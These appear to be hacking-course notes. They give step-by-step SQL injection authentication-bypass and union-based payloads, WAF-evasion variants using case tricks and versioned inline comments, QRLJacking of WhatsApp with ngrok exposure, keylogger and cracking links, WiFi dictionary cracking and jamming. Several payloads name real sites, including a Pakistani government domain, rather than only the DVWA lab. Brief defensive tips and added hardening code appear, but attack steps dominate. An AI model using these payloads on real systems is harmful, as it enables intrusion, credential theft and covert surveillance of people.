day2 yoyo

Sep 17th, 2017
Day 2
-----
Web Application Hacking and Security
------------------------------------
Website: A collection of pages is known as a website.

Types of Websites

Static : A static website has no database behind it, so the user can view the content but cannot submit any input from the user's side.

For Example: Pure HTML site.

Dynamic : These websites carry a database within them, so they have many user-interaction areas where the user enters information/data that is sent to and saved in the backend.

For Example: facebook, google, twitter, ums etc.
OWASP TOP 10 Attacks
O : Open
W : Web
A : Application
S : Security
P : Project

www.owasp.org
  25.  
SQL Injection
-------------
SQL : Structured Query Language

DDL : Data Definition Language

DML : Data Manipulation Lang.

DCL : Data Control Lang.
Attack 1: Authentication Bypass Attack
--------------------------------------
When a hacker tries to bypass the login panel of the website and gain access to the admin panel with all its features, through which he/she can manipulate the website content.

Target : safesecurities.com.pk

userid=osama admin
password=bomb admin

Resulting query once the payload is appended to both fields:
select * from userstable where userid='osama'or'1'='1' and password='bomb'or'1'='1'

Payload: 'or'1'='1
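As an added example (not from the notes), the same login built two ways in Python against an in-memory SQLite table: string concatenation, where the `'or'1'='1` payload above returns every row, and a parameterized query, where the identical input matches nothing while a genuine login still works. The table name follows the query in the notes; the sample rows and the `role` column are constructed.

```python
import sqlite3

# Constructed in-memory database for the demo (not the notes' target); the
# table and column names follow the query shown in the notes.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE userstable (userid TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO userstable VALUES (?, ?, ?)",
                    [("admin", "S3cret!", "admin"), ("rahul", "hunter2", "user")])
    return con

def login_concat(con, userid, password):
    """Vulnerable: the input is glued into the SQL text, so the quote in the
    payload closes the literal and 'or'1'='1 becomes part of the WHERE clause."""
    sql = (f"select * from userstable where userid='{userid}' "
           f"and password='{password}'")
    return con.execute(sql).fetchall()

def login_param(con, userid, password):
    """Hardened: placeholders hand the values to the driver as data, so the
    same payload is compared literally against the column and matches nothing."""
    sql = "select * from userstable where userid=? and password=?"
    return con.execute(sql, (userid, password)).fetchall()

def demo():
    """Returns (rows from the vulnerable login, rows from the parameterised
    login, rows for a genuine admin login), all with the notes' payload."""
    con = make_db()
    payload = "'or'1'='1"            # the payload from the notes
    attacker = ("osama" + payload, "bomb" + payload)
    vuln = login_concat(con, *attacker)
    safe = login_param(con, *attacker)
    legit = login_param(con, "admin", "S3cret!")
    return len(vuln), len(safe), len(legit)

if __name__ == "__main__":
    # (2, 0, 1): every row leaks, the bypass is blocked, the real login still works
    print(demo())
```

The concatenated WHERE clause reads `userid='osama' or '1'='1' and password='bomb' or '1'='1'`, and the trailing `or '1'='1'` is true for every row, which is why the row count equals the table size.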
  48.  
Union Based Injection
---------------------
DVWA

D : Damn
V : Vulnerable
W : Web
A : Application

Download : www.dvwa.org

Requirements
------------
1. XAMPP Server (turns your computer into a server)
X : Cross Platform
A : Apache
M : MySQL
P : PHP
P : Perl

Download: apachefriends.org
2. DVWA : Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

3. Copy and paste the downloaded files into the c:/xampp/htdocs folder

127.0.0.1/dvwa

username=admin
password=password

Step 1: Target
http://192.168.235.174/dvwa/vulnerabilities/sqli/

Step 2: Find any GET method in the URL of the website

GET : www.gmail.com/php?id=10
POST : www.gmail.com/id/
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

Step 3: Check the exception handling
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#

Step 4: Find the total number of columns in the respective table, where id is a column.
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#

Step 5: Dump the 2 columns found, on the right hand side.
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#

Step 6: Get the database name and version
Database->Tables->Columns->Data
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#

Step 7: Get all the tables of the website from the database.
Schema: the mother of the database (the top-level container).
Tables : information_schema.tables

Columns : information_schema.columns

http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#

Target Table Found : users

Step 8 : Get the columns of the users table
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Step 9 : Get the data from the user and password columns
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select user,password from users--+&Submit=Submit#

  129.  
Bypassing Firewall aka Union Based Injection via Web Application Firewall techniques
-----------------------------------------------------------------------------------
Target: multan.gov.pk

Step 1: Find the GET method in the URL
http://target.com/files.php?id=1

Step 2: Check the exception handling
http://target.com/files.php?id=1'

Step 3: Count the total number of columns
http://target.com/files.php?id=1 order by 3--+

Step 4: Dump the columns on the right hand side.
http://target.com/files.php?id=1 union select 1,2--+

Bypassing Technique 1: Upper/Lower Case
union select
UnIoN sElEcT -> new payload

http://target.com/files.php?id=1 UnIoN sElEcT 1,2--+

Bypassing Technique II: Inline Comments
--------------------------------------
Executable inline comments

/*!UnIoN*/ /*!SeLeCt*/

http://target.com/files.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+

Bypassing Technique 3: Version Based Inline Executable Comments
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+

MySQL version : number used in the comment
1.00.00 : 10000
2.00.00 : 20000
3.00.00
4.00.00
5.00.00 : 50000

  172.  
Step 5: Get the database
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+

Step 6: Get the tables of the database
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+

Target Table : users

Step 7: Get the columns
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+

Step 8: Get the login and password
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from users--+

Secure
------
1. Do not run the WAF with its default security settings.
2. Keep the WAF's blacklisted parameters and signatures up to date.
3. Make sure you apply custom changes in the WAF according to the attacks you are actually receiving.
4. Never switch the firewall off in the hope of faster response times under heavy traffic.
5. Have good validation of received queries and inputs at the server level as well.
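As an added example (not from the notes), the normalization a WAF needs before its `union select` signature is applied, covering the three bypass techniques above: MySQL executes the body of `/*!...*/` and `/*!50000...*/` comments, so a matcher must resolve those comments, drop plain ones, collapse whitespace and fold case before comparing. The sample URLs are constructed from the payload shapes in the notes against the notes' `target.com` placeholder, plus two benign requests that must not be flagged.

```python
import re
from urllib.parse import urlparse, parse_qs

# MySQL executes the body of /*!...*/ and /*!50000...*/ comments, so the
# matcher must keep that body; ordinary /* ... */ comments are dropped.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")

def normalize(value):
    """Canonical form of one parameter value: comments resolved, whitespace
    collapsed, case folded. Run before any signature is applied."""
    v = VERSIONED_COMMENT.sub(r" \1 ", value)
    v = PLAIN_COMMENT.sub(" ", v)
    v = re.sub(r"\s+", " ", v)
    return v.strip().lower()

def flag_union_injection(url):
    """Return {param: normalized value} for each query parameter that still
    reads 'union ... select' after normalization."""
    hits = {}
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:           # parse_qs already decodes %xx and '+'
            norm = normalize(raw)
            if UNION_SELECT.search(norm):
                hits[name] = norm
    return hits

# Constructed sample requests: the four payload shapes from the notes against
# the notes' placeholder host, plus two benign requests that must not match.
SAMPLE_URLS = [
    "http://target.com/files.php?id=1 union select 1,2--+",
    "http://target.com/files.php?id=1 UnIoN sElEcT 1,2--+",
    "http://target.com/files.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+",
    "http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+",
    "http://target.com/files.php?id=1",
    "http://target.com/search.php?q=reunion selected",
]

def scan(urls=SAMPLE_URLS):
    """One boolean per URL: True when some parameter is flagged."""
    return [bool(flag_union_injection(u)) for u in urls]

if __name__ == "__main__":
    for url, hit in zip(SAMPLE_URLS, scan()):
        print("FLAG " if hit else "pass ", url)
```

Matching on the normalized value catches all three variants with a single signature; it is a layer in front of item 5, not a replacement for parameterized queries on the server.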
  194.  
Whatsapp Hacking Attack : QRLJACKING
------------------------------------
Step 1: Download Kali Linux (2.99GB)
kali.org
How to Install and Run : Watch: https://www.youtube.com/watch?v=3ycEhwrkKYU

Step 2: Run it and fill in the username and password
username: root
password: toor

Step 3: Download the QRLjacking code from Github
Open Terminal: git clone https://github.com/OWASP/QRLJacking.git

Step 4: Open the QRLframework folder
Step 5: Give execute permission to qrljacker.py
chmod +x qrljacker.py
Step 6: Run it in the terminal: ./QrlJacker.py
Step 7: Select Chat Application -> Whatsapp -> Select Port 1337

Step 8: To make this fake Whatsapp QR code LIVE on the internet,
download a service AKA ngrok
https://ngrok.com/download

Facebook | Email Hacking Methods
--------------------------------
Family Keylogger : http://www.spyarsenal.com/download.html

How to Secure your Email Accounts
---------------------------------
1. Always use a pass phrase instead of a password.
2. Always use a robust password
howsecureismypassword.net

checkurcardhackedornot.com
Card no, Expiry Date and CVV : Check

Example pass phrase: oncetherewasacrow

3. *&Ig3SimG&* (example of a robust password)
4. Activate 2-Step Verification in your Gmail.
5. Facebook: Backup codes
6. Always check your login activity in Gmail to see any unauthorised access.

Reverse Engineering | Cracking LIVE
-----------------------------------
Reverse Engineering

Engineering : The goal of engineering is to build something.

High Level : Eng. languages : C, C++, Java, Python

Middle Level : Assembly : .obj

Low Level : Binary : .exe

Requirements
------------
1. OllyDBG
2. Perfect Keylogger
3. Windows Platform

Target : http://www.blazingtools.com/downloads.html

Wifi Hacking
------------
Wifi Hacking: Wifi stands for wireless fidelity. It works on protocol 802.11a onwards. The goal is to provide wireless connectivity between hosts for data and information transfer and to establish a valid communication channel for the same.

Types of KEY Security Encryptions
---------------------------------
1. WEP : 64bit
2. WPA : 128bit
3. WPA-2 PSK <--- Target, 256 and above

Problem : You cannot brute force the KEY.

How to Crack then : Dictionary Based Attack

Requirement
-----------
1. Kali Linux 1.8 version (old)
2. airmon-ng : This CLI application is used to put your wifi device into monitoring mode and check whether it is capable of proceeding with the attack.
3. airodump-ng : This application will help you dump the air packets and identify how many wifi access points are nearby, so that you can select the target to test its security.
4. macchanger* : This helps you spoof your wifi adapter's real identity with a fake MAC address in case you want to do anonymous security testing.
5. aircrack-ng : This application will help you crack the key you extracted during the wifi hacking process; it matches it against the dictionary and, if found, shows the key.

rahul -->!@#$% --> Mobile

Router:rahul->!@#$% <---- !@#$%---rahul

Network Attacks : Exploitation
------------------------------
Active Attack : This attack is mainly concerned with attacking the device directly. Hence we get the IP of the device and then attack that IP directly; the main goal of this attack is either to gain access to that device or, if that fails, to take the host down.

Example: Router DDOS Attack, DHCP Starvation Attack with Yersinia and websploit wifi jammer

*Requirement : websploit in Kali Linux
Step 1: Open terminal and type websploit

Step 2: To see the CLI network attacks type show modules

Source Tute: https://www.youtube.com/watch?v=I4OPAdE5yv8

Source Article: http://www.hackingtutorials.org/metasploit-tutorials/websploit-wifi-jammer/